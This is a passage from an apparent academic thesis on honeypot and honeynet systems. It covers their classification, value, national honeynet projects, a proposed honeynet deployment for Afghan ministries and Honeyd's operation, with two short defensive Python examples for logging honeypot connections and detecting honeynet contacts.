It is different from the other technologies used in security. The strongest reason is that most security technologies in use today focus on specific problems. For example, firewalls are used to protect an organization by controlling what traffic can flow where; they are used as an access control device, deployed around an organization's perimeter to block unauthorized activities.

Network intrusion detection systems are used to detect attacks by monitoring system or network activities; they are used to identify unauthorized activity. The big difference is that honeypot systems are not limited to solving specific problems. They are highly flexible technologies and can be applied to a variety of different situations as a countermeasure technology for unknown and new types of attacks.

3.2 History of Honeypot System

It is nice to have brief, useful information about the unique history of honeypots. The honeypot concept has been around for more than two decades. The first documented work on the honeypot concept dates from 1990/1991. Later, in 1997, the first solutions became available to the security community. In 1998 development began on CyberCop Sting, one of the first commercial honeypots sold to the public.[15]

CyberCop Sting introduced the concept of multiple virtual systems on a single honeypot. During 1998 BackOfficer Friendly, a free, simple-to-use Windows-based honeypot, was introduced. In 1999 the publication of "Know Your Enemy" raised awareness of honeypot technologies. In 2000/2001 honeypots were used for detecting new attacks and threats in most organizations.[15]

In 2002 a honeypot was used to detect and capture new and unknown attacks. Now many honeypot technologies have been developed, introduced and implemented. This was a short and useful history of honeypot systems.[15]

3.3 Classification of Honeypot Systems

Honeypot systems are classified according to purpose and level of interaction. According to purpose there are two types: research honeypot systems and production honeypot systems. According to level of interaction they are divided into three categories: low-interaction, medium-interaction and high-interaction honeypot systems.

3.3.1 Classifying Honeypot Systems By Purpose

Honeypot systems are classified into two general categories, and this section discusses the classification according to purpose. It is divided into two subcategories: research honeypot systems and production honeypot systems. Research honeypot systems come first, as shown in figure 3.1.


Figure 3.1: The Honeypot Classification Diagram

Research Honeypot Systems

As the title makes obvious, research honeypot systems are used for gathering information for research. In general they are used to gather critical information about who the threat is, why they attack, how they attack, and what their tools and technologies are. This is the most complex type of honeypot system. Designing a research honeypot system using real systems and services needs more time and a lot of resources, because the attacker interacts with real systems and services. They are usually used in developed countries, where Blackhat hacker communities exist.

They interact with attackers to gather information about their identity, tools and technologies, how they develop, what they want, and so on. These research honeypot systems are used mostly by companies whose focus is security; they use this type of honeypot to research and gather critical information about new technologies and unknown types of attacks in order to design countermeasures for them. They are also used in the military, government, universities and other places where the assets are the most important issue.

Production Honeypot Systems

Production honeypot systems are used in organizations to protect their assets from new and unknown attacks. For example, if an organization has a database server, it can use a honeypot to emulate a database server and capture the attackers' interaction with it.


This type of honeypot simply logs the attacker's interaction with the services emulated by the honeypot system. Implementing and designing a production honeypot system does not need a lot of resources or time and is easy compared with a research honeypot system. Production honeypots help enormously to prevent attacks and reduce vulnerabilities on real systems. Finally, production honeypot systems collect a small amount of data that has high value for analysis.

3.3.2 Classifying Honeypot Systems by Level of Interaction

Honeypot systems are implemented in different ways depending on what we want to do with them: learning from attackers in action about their tools, technologies and tactics. We implement a honeypot system according to our needs. More interaction with the attacker requires a more complex honeypot implementation that emulates operating systems and services in operation, so that if an attacker connects to it, it acts like a real server or service.

This flexibility in how honeypot systems interact is what categorizes them by level of interaction. The measure used to compare honeypot systems is the level of interaction an attacker has with them.

Low-Interaction Honeypot Systems

The level of interaction in this type of honeypot system is low, and implementation is easy and simple. It is like a service running on a host, configured to emulate some operating system and services virtually. For example, it emulates a virtual operating system with some services that seem vulnerable to attack. When an attacker attacks that system and starts interacting with it, the low-interaction honeypot first captures the date and time of the attack, then the source IP address and source port number, the destination IP address and destination port number, and some other information depending on the technology being used. Services like SSH, Telnet and FTP are mostly emulated with a low level of interaction with the attacker.

We can build a virtual network containing servers, switches and routers, but with limited functionality. In short, it is a simple, lightweight implementation with low risk and limited information gathering.
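As an added example (written for this edit; it is not code from the thesis or from any honeypot product the thesis names), the following Python program is a minimal low-interaction honeypot of the kind described above: it listens on a TCP port, presents a fake SSH banner, records the date and time, source IP and port, destination IP and port and the first bytes the client sends, and then closes the connection. Nothing the client sends is interpreted or executed, which is what keeps the risk low. The port number, the banner text and the `probe` client used to exercise it locally are assumptions.

```python
"""Minimal low-interaction honeypot (added example, not from the thesis).

It emulates only a service banner. Every connection is recorded as a
HoneypotEvent carrying the metadata a low-interaction honeypot collects
(timestamp, src/dst IP and port, first bytes received); nothing sent by
the client is ever acted upon. Port 2222 and the banner are assumptions.
"""
import socket
import threading
import time
from dataclasses import dataclass
from typing import List, Optional

FAKE_BANNER = b"SSH-2.0-OpenSSH_7.4\r\n"  # constructed banner (assumption)


@dataclass
class HoneypotEvent:
    timestamp: str      # ISO 8601, UTC
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    first_bytes: bytes  # what the client sent after the banner, capped


class LowInteractionHoneypot:
    def __init__(self, host: str = "127.0.0.1", port: int = 2222,
                 read_timeout: float = 2.0):
        self.host, self.port, self.read_timeout = host, port, read_timeout
        self.events: List[HoneypotEvent] = []
        self._lock = threading.Lock()
        self._stop = threading.Event()
        self._sock: Optional[socket.socket] = None
        self._thread: Optional[threading.Thread] = None

    def start(self) -> None:
        self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self._sock.bind((self.host, self.port))
        self._sock.listen(5)
        self._sock.settimeout(0.2)             # lets the accept loop see stop()
        self.port = self._sock.getsockname()[1]  # port 0 resolves to a real port
        self._thread = threading.Thread(target=self._serve, daemon=True)
        self._thread.start()

    def _serve(self) -> None:
        while not self._stop.is_set():
            try:
                conn, addr = self._sock.accept()
            except socket.timeout:
                continue
            except OSError:          # listening socket closed by stop()
                break
            self._handle(conn, addr)

    def _handle(self, conn: socket.socket, addr) -> None:
        with conn:
            conn.settimeout(self.read_timeout)
            try:
                conn.sendall(FAKE_BANNER)       # the only thing we ever "serve"
                data = conn.recv(1024)          # record, never interpret
            except (socket.timeout, OSError):
                data = b""
            dst_ip, dst_port = conn.getsockname()[:2]
            event = HoneypotEvent(
                timestamp=time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
                src_ip=addr[0], src_port=addr[1],
                dst_ip=dst_ip, dst_port=dst_port,
                first_bytes=data[:256],
            )
            with self._lock:
                self.events.append(event)

    def wait_for_events(self, n: int, timeout: float = 3.0) -> bool:
        """Block until at least n events are recorded; False on timeout."""
        deadline = time.monotonic() + timeout
        while time.monotonic() < deadline:
            with self._lock:
                if len(self.events) >= n:
                    return True
            time.sleep(0.05)
        return False

    def stop(self) -> None:
        self._stop.set()
        if self._sock:
            self._sock.close()
        if self._thread:
            self._thread.join(timeout=2)


def probe(host: str, port: int, payload: bytes = b"SSH-2.0-scanner\r\n") -> bytes:
    """Constructed client used to exercise the honeypot locally; returns the banner."""
    with socket.create_connection((host, port), timeout=2) as c:
        banner = c.recv(1024)
        c.sendall(payload)
    return banner


if __name__ == "__main__":
    hp = LowInteractionHoneypot(port=2222)
    hp.start()
    print(probe("127.0.0.1", hp.port))
    hp.wait_for_events(1)
    for ev in hp.events:
        print(ev)
    hp.stop()
```

Each `HoneypotEvent` is exactly the small, high-value record the thesis attributes to low-interaction honeypots: because the listener serves no legitimate users, every line it writes is worth a look, and because it never executes what it receives, an attacker who recognizes it gains nothing beyond the banner.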

Medium-Interaction HoneyPot Systems

It is a combination of the low-interaction and high-interaction honeypot systems: it has more ability than a low-interaction honeypot system but less functionality than a high-interaction one. For example, in a medium-interaction honeypot system we build a virtual IIS server that includes some additional functionality; privileges are higher and interaction is greater than in low-interaction honeypot systems.


Implementation of a medium-interaction honeypot is more complex and time-consuming, and the risk is higher if something goes wrong. The information collected is greater than with a low-interaction honeypot system. Sometimes the attackers may interact with real systems. In short, it is more complex to implement and needs more time and resources, but in return it yields more information, more activity and interaction, and captures worms and a lot of critical information about the attackers.[16]

High-Interaction Honeypot Systems

The most complex honeypot systems, which can do anything that belongs to the honeypot concept, are the high-interaction honeypot systems. Everything needed to track an attacker who interacts with the honeypot can be done with this type, because the attacker interacts with real systems and services and can do whatever he wants. Implementing this type of honeypot is the most complex and time-consuming procedure and requires the most resources of all the honeypot types.

The risks with this type of honeypot system are the greatest, because if an attacker takes control of the honeypot he can attack other systems or resources. For this reason high-interaction honeypot systems are usually placed behind a firewall that controls the inbound and outbound traffic to the honeypot.[13]

3.4 Honeypot Systems Policy

If we want an effective implementation of a honeypot system, we define our policy before implementing it. We ask ourselves what we need from implementing the honeypot system and which issues are important to cover, because honeypot systems are not used for a single purpose or target; they can be implemented for different jobs. We must define these policies before implementing honeypot systems.

For example, when a honeypot system is used for detection, its value is in detecting unauthorized activity like scans, probes or attacks. Another important issue is the authorization to use honeypot systems in organizations. An organization may allow honeypot systems to be used for detecting scans and attacks but not allow a research honeypot to capture keystrokes or even conversations in an online chat.

These issues must be defined before designing and implementing honeypot systems. Finally, implementing a honeypot system needs professional security administrators to design and implement it for its specific purposes.

3.5 The Value of Honeypot Systems

After understanding the definition and types of honeypot systems, it is time to focus on their value. As discussed before, the value of a honeypot system is what we want from implementing it, because unlike intrusion detection systems and firewalls it does not focus on a specific problem; instead it is a technology that covers the whole security architecture. Honeypot systems have their own special advantages and disadvantages, which are discussed in the next sections.[19]

Advantages of Honeypot systems

Honeypot systems are lightweight technologies used to gain information about attackers. The information recorded covers location, behaviour and the technologies used, and more information is gathered depending on the level of interaction you implement. Design and implementation are easy, taking a few steps to configure, but complexity increases with the level of interaction and the purposes you want to implement.

The strongest advantage is that, unlike intrusion detection systems and firewalls, honeypots never run out of resources. The buffer of an intrusion detection system may become full and drop packets, and the connection table of a firewall may become full so that it cannot recognize more connections. Honeypot systems never face these kinds of problems, because they deal only with actions directed at them.

The value of the data captured by honeypot systems is higher than that of any other data captured by firewalls or intrusion detection systems. Instead of logging gigabytes of data every day, most honeypot systems collect several megabytes of high-value data per day. The data is about scans, probes and attacks, or whatever purpose the honeypot was implemented for, and it is in a format that is quick and easy to understand and analyze.

Disadvantages of Honeypot systems

Given these advantages you may think it is great, but everything that has advantages also has disadvantages. When an attacker attacks and interacts with the virtual systems and services, he may realize that it is a honeypot system, start attacking the honeypot system directly, take control of it and use it against the organization as a powerful weapon. Honeypot systems capture only information about activity that interacts with them; the attacker may attack other systems in our network rather than the honeypot systems. The risk a honeypot system faces depends on the level of interaction built into the environment. These are the disadvantages of honeypot systems. [10]


Chapter 4
HONEYNET SYSTEMS

A honeynet is one of the primary technologies used by security communities for information gathering. This chapter discusses the definition of a honeynet system, its values and other subtopics related to honeynet systems. Covering some important honeynet technologies in use at the time of writing this thesis is one of the interesting goals the writer of the thesis aims for, and it will be achieved. Important honeynet technologies in use today means the honeynet systems running in some countries for knowing their enemies, and in some security communities for information gathering and for studying the attackers' technologies, methods and motives for the purpose of increasing network security. One important difference between honeynet systems and most honeypot systems is that honeynets use real systems to interact with the attackers.

4.1 Definition of Honeynet Systems

A honeynet is a designed network with intentional vulnerabilities that invites attackers in, for the purpose of gathering information, studying their activities, methods and motives, and increasing network security. A honeynet is made of one or more honeypot systems. Honeynet systems usually use real systems and services and look like a normal network, a worthy target for attackers. Since it has real systems and services, a honeynet is a high-interaction system that uses real systems, applications and services for interacting with attackers; there are no emulated operating systems or services here, everything is real. Since it serves no authorized users, every attempt to contact the network is an illicit attempt.
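The last sentence of the definition above is the whole detection rule for a honeynet: no legitimate user has any reason to touch it, so any flow whose destination lies in the honeynet address range is suspect. As an added example (not code from the thesis), the Python below applies that rule to constructed firewall-style log lines and groups the hits per source host, which is the view a responder wants: which hosts contacted the honeynet, on which ports, when, and whether the source is one of our own internal machines. The log format, the honeynet and internal address ranges and the sample lines are all assumptions made for this example.

```python
"""Honeynet contact detection over firewall-style logs (added example, not from the thesis).

Rule: a honeynet serves no authorised users, so every flow to a honeynet
address is illicit by definition. Any internal source that appears here
deserves the highest priority, since it suggests a compromised host.
All address ranges, the log format and the sample lines are constructed.
"""
import ipaddress
import re
from typing import Dict, Optional

HONEYNET_RANGES = [ipaddress.ip_network("10.99.0.0/24")]   # assumed honeynet subnet
INTERNAL_RANGES = [ipaddress.ip_network("10.0.0.0/8")]     # assumed corporate space

# Assumed log line shape: "<ts> <ACCEPT|DROP> proto=<p> src=<ip>:<port> dst=<ip>:<port>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<action>ACCEPT|DROP) proto=(?P<proto>\w+) "
    r"src=(?P<src>[\d.]+):(?P<sport>\d+) dst=(?P<dst>[\d.]+):(?P<dport>\d+)$"
)

# Constructed sample log (chronological order assumed).
SAMPLE_LOG = """\
2014-12-01T10:00:01Z ACCEPT proto=tcp src=10.1.5.23:51322 dst=10.1.0.10:443
2014-12-01T10:00:04Z ACCEPT proto=tcp src=198.51.100.77:40001 dst=10.99.0.5:22
2014-12-01T10:00:05Z ACCEPT proto=tcp src=198.51.100.77:40002 dst=10.99.0.5:23
2014-12-01T10:00:05Z ACCEPT proto=tcp src=198.51.100.77:40003 dst=10.99.0.6:445
2014-12-01T10:00:09Z DROP proto=udp src=10.1.5.40:5353 dst=10.1.0.255:5353
2014-12-01T10:01:10Z ACCEPT proto=tcp src=10.1.5.23:51400 dst=10.99.0.9:3306
this line is malformed and must be skipped, not crash the detector
"""


def parse_line(line: str) -> Optional[dict]:
    """Parse one log line; returns None for lines that do not match the format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["sport"], rec["dport"] = int(rec["sport"]), int(rec["dport"])
    return rec


def in_ranges(ip: str, ranges) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in ranges)


def detect_honeynet_contacts(log_text: str) -> Dict[str, dict]:
    """Group every flow aimed at the honeynet by source address.

    Returns {src_ip: {"count", "ports", "first", "last", "internal"}}.
    Both ACCEPT and DROP lines count: even a dropped probe shows intent.
    """
    findings: Dict[str, dict] = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not in_ranges(rec["dst"], HONEYNET_RANGES):
            continue
        f = findings.setdefault(rec["src"], {
            "count": 0, "ports": set(), "first": rec["ts"], "last": rec["ts"],
            "internal": in_ranges(rec["src"], INTERNAL_RANGES),
        })
        f["count"] += 1
        f["ports"].add(rec["dport"])
        f["last"] = rec["ts"]
    return findings


def report(findings: Dict[str, dict]) -> list:
    """Render findings as one line per source, internal sources first."""
    lines = []
    for src, f in sorted(findings.items(), key=lambda kv: (not kv[1]["internal"], kv[0])):
        tag = "INTERNAL-HOST" if f["internal"] else "external"
        ports = ",".join(str(p) for p in sorted(f["ports"]))
        lines.append(f"{tag} {src} -> honeynet ports [{ports}] x{f['count']} "
                     f"between {f['first']} and {f['last']}")
    return lines


if __name__ == "__main__":
    for line in report(detect_honeynet_contacts(SAMPLE_LOG)):
        print(line)
```

The ordering in `report` reflects the point the definition makes: an external scanner walking honeynet ports is expected and informative, but an internal host reaching into the honeynet has no legitimate explanation and should be treated as a likely compromise rather than as noise.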

4.2 Overview of Honeynet Systems

As we learned about honeypot systems in detail in the previous chapter, it is now good to have an overview of honeynet systems. Conceptually a honeynet is a network made of one or more honeypot systems. In information security there are many other mechanisms, such as firewalls, intrusion detection systems and encryption systems, that protect the assets or resources of an organization as much as possible and detect any vulnerability or threat and defend against it. The primary purpose or goal of a honeynet system is to gather information on threats, and this information has different values for different organizations. Here you will see some examples of the different values of honeynet systems for different organizations.

• Academic research institutions use honeynet systems to gather information for research purposes, such as worm activity.

• Security organizations use honeynet systems to capture information and analyse malware for antivirus and intrusion detection system signatures, and to learn new types and ways of attack and new types of threats, in order to build and design countermeasures against them.

• Government organizations use honeynet systems to learn more about their enemies, who is targeting them and why.

• Internet Service Providers use honeynet systems to capture and analyse information in order to terminate botnets on their networks.

• Security responders use honeynet systems for research and incident response.

Many other types of organization use honeynet systems depending on their needs. The important value of a honeynet system is the information it gathers. The information may have different values according to the purpose of using the honeynet system, that is, who you are and what you need from implementing it. This shows the great value of honeynet systems: a single technology used for many purposes.

4.3 Countries That Use Honeynet Systems

As we all know, it is very important for a country to know its enemies all over the world. In the real world a country has many different military and secret organizations for providing security to its people and society. In the cyber world it is likewise important for all countries to check and monitor what is going on and to be aware of what is happening there. Most of the powerful countries have implemented many different technologies for these kinds of issues and have their own cyber police for providing security in the cyber world and fighting cyber crime.

This thesis introduces some of the countries that use honeynet systems for providing security against new types of attacks, threats and vulnerabilities and for gathering information about attackers. As discussed before, most countries have implemented honeynet systems for providing security; Iran, Pakistan, India, Saudi Arabia, Germany, Poland and the United Kingdom are chosen as instances for this thesis. A brief introduction to each follows in the subsections below.


4.3.1 IRAN

The Iran honeynet system was founded in January 2010. Its aim is to gather information about new and active security threats and vulnerabilities on today's Internet, to learn the technologies, tools, tactics and motives involved in computer and network attacks, and to share the lessons learned. The main areas they focus on and are interested in researching are:

• Malware Analysis

• Botnet Detection

• Web Honeypots

• Client Honeypots

• And etc...

• Its Address is: http://www.irhoneynet.org

Figure 4.1: The Iran Honeynet System

4.3.2 PAKISTAN

The goal of the Pakistan honeynet system is to learn about and raise awareness of the motives and tactics of the Black Hat community that targets Pakistan's internal networks.


Sharing knowledge of the various technologies and tools that hackers use on the Internet today is also an aim of the Pakistan honeynet system, as is providing services to the federal government, the private sector, state and local governments and higher education establishments inside the country.

The Pakistan honeynet focuses on awareness of the threats and vulnerabilities that exist on Pakistan's networks today.

• Its Address is: http://www.honeynet.pk

Figure 4.2: The Pakistan Honeynet System

4.3.3 INDIA

The Indian Honeynet Project is a chapter of the Honeynet Project. It has professional and experienced members from large IT organizations in India. These members come from different categories: some of them work directly or indirectly with law enforcement, defence and cybercrime under the Government of India, and others are technology specialists and students. They run a distributed honey network across India to help research and report what they learn from the honeynet community. Everyone who works on the project does so freely and voluntarily.

• Its Address is: http://www.honeynet.org.in


Figure 4.3: India Honeynet System

4.3.4 SAUDI ARABIA

The Saudi Honeynet Project aims to gather information about the security threats and vulnerabilities currently active in the networks of the Kingdom of Saudi Arabia (KSA). Its goal is to learn the new technologies, tactics and motives of attackers and to share the lessons learned with the public and the wider IT community. They use honeynet systems because network security is a top priority.

• Its Address is: http://www1.kfupm.edu.sa/honeynet


Figure 4.4: Saudi Arabia Honeynet System

4.3.5 GERMANY

Most of the members of the German Honeynet Project are from the University of Mannheim (Laboratory for Dependable Distributed Systems) and work on their Ph.D. theses. They have implemented different honeynet systems for different tasks, and they research different kinds of malware and develop countermeasures against them.

• Its Address is: http://www.honeynet.org/node/368


Figure 4.5: German Honeynet System

4.3.6 POLAND

The Polish Chapter of the Honeynet Project was founded in November 2011. This chapter was built by young people to share their experience and knowledge of various areas of network and computer security. They develop various honeypot technologies, both server-side and client-side, for fighting Internet malware. Their honeynet systems are located in 70 different parts of the country to monitor malicious activity in Polish networks.

• Its Address is: http://pl.honeynet.org


Figure 4.6: The Polish Honeynet System

4.3.7 UK

The last example is the UK Honeynet Project, a chapter of the Honeynet Project that was founded in 2002. Its aim is to gather information about the new types of security threats and vulnerabilities active in UK networks today, to learn the technologies and tools, tactics and motives of the black hat community, and to share the lessons learned with the public and the wider IT community.

• Its Address is: http://www.ukhoneynet.org


Figure 4.7: The United Kingdom Honeynet System

4.4 Security Communities That Use Honeynet Systems

There are many network security organizations and companies around the world. Most of them use honeypot and honeynet systems in their research to gather information about new types of threats, attacks and vulnerabilities. They may use this information to develop countermeasures or other security products. Some of these organizations have online real-time maps that show the live attacks taking place in the world, and here it is nice to have a short introduction to some of the most popular ones.

4.4.1 THE HONEYNET PROJECT

The Honeynet Project is an international non-profit security research organization founded in 1999. It investigates the latest attacks and develops open source security technologies and tools to improve Internet security. It has many volunteers around the world who fight malware, discover new types of attacks and create security technologies and tools that may be used by businesses, governments or military organizations all over the world. The organization researches and analyses the latest attacks and makes the public and leading security professionals aware of new threats across the world. [3]

Research


The security research of the Honeynet Project's volunteers covers collecting and analysing data and gathering information about attackers and the malicious software they use. They also cover additional information about attackers, such as their motives, how they communicate, when they attack systems and what actions they take on the target system. These findings are provided through the white papers known as Know Your Enemy, published by the Honeynet Project. Everything is posted on the Honeynet Project website.[3]

Awareness

One of the most important services of the Honeynet Project is security awareness. Members of the Honeynet Project all over the world educate the public about new threats to systems and information. They make people aware of the threats and vulnerabilities that exist on today's Internet. By providing this information to the public, people can better understand that they are a target and learn the basic countermeasures they can take against these threats, as well as the advanced threats that exist and the defences against them. This information is also distributed through the Know Your Enemy series of papers.[3]

Tools

Another very important service of the Honeynet Project is developing and expanding security technologies and tools. Some recent examples include Cuckoo, Capture-HPC, Glastopf, HoneyC, Honeyd and Honeywall. These technologies and tools are also provided through the Honeynet Project site, for organizations interested in continuing their own research on cyber threats.[3]

• Its Address is: http://map.honeynet.org/


Figure 4.8: The Honeynet Project

4.4.2 THE NORSE

Norse is one of the global leaders in live attack intelligence. It delivers continuously updated, new and unique Internet and darknet intelligence to help organizations detect and block attacks that other systems miss. It detects new threats that traditional threat intelligence tools miss. Its millions of dark sensors, honeypots, crawlers and agents deliver unique visibility into the Internet.

• Its Address is: http://map.ipviking.com/


Figure 4.9: The Norse Honeynet Project

4.4.3 THE FIREEYE

FireEye has invented a virtual machine based security platform that provides real-time threat protection to enterprises and governments worldwide against the next generation of cyber attacks. It uses dynamic threat intelligence to identify and block cyber attacks in real time, and FireEye covers 2500 customers across more than 65 countries.

• Its Address is: https://www.fireeye.com/cyber-map/threat-map.html


Figure 4.10: The FireEye Honeynet System

4.4.4 THE GLOBAL BOTNET THREAT ACTIVITY

Trend Micro is a global leader in IT security. With over 25 years of security expertise, it develops innovative security solutions that make the world safe for businesses and consumers to exchange digital information. It is recognized as the market leader in server security, cloud security and small business content security.

• Its Address is: http://www.trendmicro.com/us/security-intelligence/current-threat-activity/global-botnet-map/


Figure 4.11: The Global Honeynet System

4.4.5 THE WORLD MAP

F-Secure has a comprehensive online technology for everyone who is interested in understanding the world virus situation at a glance. It is developed for research purposes and is available to the general public in four languages. Visitors first see the situation on the full world map, but they can quickly search for information based on a geographical area or country.

• Its Address is: http://worldmap3.f-secure.com/


Figure 4.12: The WorldMap3 Honeynet System

4.4.6 THE KASPERSKY MAP

Kaspersky has an interactive cyberthreat map that visualizes cyber security incidents happening worldwide in real time. It provides a global map that users can rotate and zoom in to any part of the world to get a closer look. Kaspersky detects threats in real time, differentiates them with different colours and gives a short description of each threat on the screen. The organization uses this gathered information to develop countermeasures for unknown and new types of attacks, threats and vulnerabilities in its security technology products.

• Its Address is: http://cybermap.kaspersky.com/


Figure 4.13: The WorldMap3 Honeynet System

4.5 Honeynet Systems For Afghanistan

Now we come to the suggested solution for Afghanistan to secure its internal networks. As discussed before, the important motives of this thesis were securing the internal networks of Afghanistan, recognizing the enemies of Afghanistan and their actions, showing others that we can do everything at the highest level, and learning how to defend against the attackers.

Here it must be shown clearly what this thesis suggests as the best solution for Afghanistan to secure its internal networks against attackers. The previous sections of this chapter were about countries and organizations that use these concepts to protect their internal networks and to research new types of attacks, threats and vulnerabilities, and gave a brief introduction to them. This section presents the best solution for Afghanistan's internal networks, especially for the Afghan ministries such as the Ministry of Interior, the Ministry of Communication and Information Technology, the Ministry of Higher Education and the others with their subordinate organizations.

It is very important for a country to protect its internal networks against attackers: to know who is attacking, how an attacker attacks, what the attackers are trying to achieve, and finally to learn how to defend against them. By implementing honeypot and honeynet systems together with other security mechanisms it is possible to track the attackers and learn these things about them, including what kinds of tactics and technologies the attackers use against our internal networks.


Figure 4.14: The Afghanistan Map

Honeypot and honeynet systems can be used effectively in the Afghan ministries for information and network security purposes. The Ministry of Interior is an important ministry where everything should be protected; by using honeypot and honeynet systems it is possible to detect any malicious traffic or attacker actions against that network. It is also advisable to use these concepts for other important ministries such as the Ministry of Communication and Information Technology, the Ministry of Higher Education and other organizations that are important and hold sensitive information.


Figure 4.15: The Afghanistan Ministries

The solution of this thesis for Afghanistan is to use high interaction honeynet systems for its important ministries to protect assets and detect attackers or malicious network traffic. As you see in the solution diagram, the honeynet is placed between the Internet and the firewall, and as discussed before, a high interaction honeypot must use real operating systems for full interaction with the attackers. Designing a high interaction honeynet system with real operating systems can be done in two different ways.

The first way is using separate physical systems for each high interaction honeypot and then networking them together to build a high interaction honeynet. The second way is using virtualization: one powerful server hosting many operating systems to build a high interaction honeynet. This honeynet network is then connected to the router that connects the Internet and the internal network. It is also possible to design the honeynet in other ways, for example placing the honeynet system between the Internet and the internal network to sniff all the traffic that flows from the Internet to the internal networks and back. With this design every packet is checked, and once any type of attack is detected the honeynet starts interacting and capturing the conversation between the attackers and the honeynet systems. The solution diagram is shown in figure 4.16.


Figure 4.16: The Best Solution For Afghanistan


Chapter 5
HONEYPOT AND HONEYNET SYSTEMS TECHNOLOGIES

This chapter focuses on important honeypot and honeynet system technologies that are in use at the time of writing this thesis, covering both commercial and free technologies in detail. We begin the chapter by introducing Honeyd (Honey Daemon), which is a cool technology regarding honeypot systems. Honeyd is open source and easy to use. It works on Unix systems and has a command line interface.

A variety of open source and closed source software was used throughout this thesis together with appropriate hardware. The focus was mainly on open source solutions because of their features and benefits: the source code is open and everyone can customize and use it according to their own targets.

5.1 Honeyd (Honey Daemon)

Honeyd is an open source low interaction honeypot system developed by Niels Provos of the University of Michigan. The first release was in 2002. It is a free technology that you can download and use. Honeyd emulates the services of a real operating system. It is one of the well-known low interaction honeypot systems that operate on Unix platforms, and a good starting point for entering the field of honeypot systems because it is easy to install, configure and understand. It is used as a production honeypot system. Since it is a low interaction honeypot, there is no real operating system installed in Honeyd; instead, services running on it emulate different kinds of operating systems and services. Because it is open source you can highly customize the honeypot system to cover your requirements, and you can also use customized versions developed by other people or security communities.

Its configuration is easy: everyone can design and create their own services and decide what emulated services run on it and which ports to open for listening. You can easily design an emulated network including routers, switches and different types of operating systems, and design different services to run on this emulated equipment. There are no real operating systems or services for an attacker to gain access to; everything is designed virtually. Honeyd detects attacks and unauthorized activities and captures their interactions with the honeypot systems.[1]

5.1.1 Value of Honeyd

Honeyd is primarily a production, low interaction honeypot system. It works the same way as other low interaction honeypot systems but with some special characteristics that make a big difference between them. When an attacker tries to connect to an emulated open port on Honeyd, the connection is logged, and Honeyd starts capturing the attacker's activities and interactions and generates an alert.

There are two other advantages that increase Honeyd's value. The first advantage is detecting connections on any TCP port, because the emulated services are not required for detection; they only exist for interaction with the attackers to gain and capture more information. The second advantage of Honeyd is being able to modify the emulated services and the level of interaction. Since it is open source you can modify and customize Honeyd according to your needs; the security community also works on improving Honeyd, adding new useful features and distributing them, for example an Internet Information Services (IIS) web server emulation developed by well-known security experts.

Another great value of Honeyd is the ability to monitor millions of IP addresses at the same time, listening on the ports and interacting through the emulated services. Honeyd can only monitor IP addresses assigned to the honeypot system, and at first sight that is only a small number of IP addresses; yet it has the ability to monitor millions of IP addresses, and it has actively been claimed to monitor thousands of IP addresses at the same time.

You may think that Honeyd is complicated to configure and implement to monitor millions of IP addresses, that each IP address would have to be identified for Honeyd to listen on for attacks, and that this would be a massively time consuming process. It is not like that. Honeyd solves this problem: instead of listening on a single IP address or specific IP addresses, Honeyd monitors entire network blocks for IP addresses that are not in use. When an attacker tries to connect to an IP address that has no system, the connection is forwarded to the Honeyd honeypot system. After receiving the connection, Honeyd replies to the attacker and starts capturing the interaction between the attacker and Honeyd.

Monitoring the level of noise on the Internet, including worms, exploit tools and technologies, automated attacks, denial of service attacks and distributed denial of service attacks, is what can be detected using Honeyd technology. These are some of the values of the Honeyd honeypot system in general. One more thing which remains is detecting new types of worms, attacks and threats together with their methods. These kinds of honeypot systems can be used for designing countermeasures for tomorrow's threats, which is the title of the thesis.

5.1.2 How Honeyd Works

Now it is nice to have a discussion about how the Honeyd honeypot system works. When an attacker attacks an IP address that does not exist on any real system, Honeyd assumes the identity of the targeted address and starts interacting with the attacker. It does not do this by assigning thousands of IP addresses to itself at once. Instead, Honeyd has only one IP address, assigned to a single interface, and this is the same interface used for managing and administering the honeypot system and for monitoring the attackers' suspicious activities.

When an attacker attacks a system that does not exist, the traffic is routed to the Honeyd honeypot system. Honeyd starts running the emulated services after receiving the connection and captures the interactions between the attacker and the Honeyd honeypot system. Honeyd captures all the activities, such as probes, scans or attacks. From the Honeyd side, the attacker is a victim of the honeypot system.

When Honeyd receives more attacks it repeats the process above for all the attackers: starting emulated services, putting them under attack and interacting with different attackers all at the same time. The question here is how you know which systems do not exist and how the Honeyd honeypot system receives the attackers' activities, because Honeyd does not actively identify non-existent systems. The issue is that we have to route the attackers' traffic for non-existent systems to the Honeyd honeypot system. There are two solutions for this issue.

The first way is black holing, used when you want Honeyd to monitor an entire network that has no active systems. Whatever IP address in that specific network an attacker targets, we know that it is an attack because the network has no live systems. Thus we are able to route the traffic of the entire network directly to the Honeyd honeypot system.

The second way is to have the Honeyd honeypot system reside on a network that has both valid and non-existent systems. Most networks in organizations are implemented with this structure: they have both real systems and unassigned IP addresses within the network. Here the goal is to route the traffic of the non-existent systems directly to the Honeyd honeypot system.

5.1.3 Interacting With Attackers

Once Honeyd receives the attacker's initial connection in one of the ways explained before, Honeyd waits to see which ports the attacker attempts to target. One of several things may happen here. Honeyd may not have a service emulator for the targeted port; in that case Honeyd may generate a reply that the requested port is closed, or may not reply at all, depending on how the Honeyd honeypot system is configured. However, Honeyd can still detect activity on any port that the attackers attempt. Or Honeyd may be configured to interact with the attackers using emulated services.

For example, if an attacker tries to connect to TCP port 123, the Honeyd honeypot system replies with an RST packet, declaring the port closed, and logs the attempt. However, if an attacker connects to TCP port 80, the honeypot system can initiate a Web server emulator, start interacting with the attacker and capture all the activity. There are also several other advanced options for interacting with the attackers; they will be discussed in the practical implementation chapter when configuring the Honeyd honeypot system.

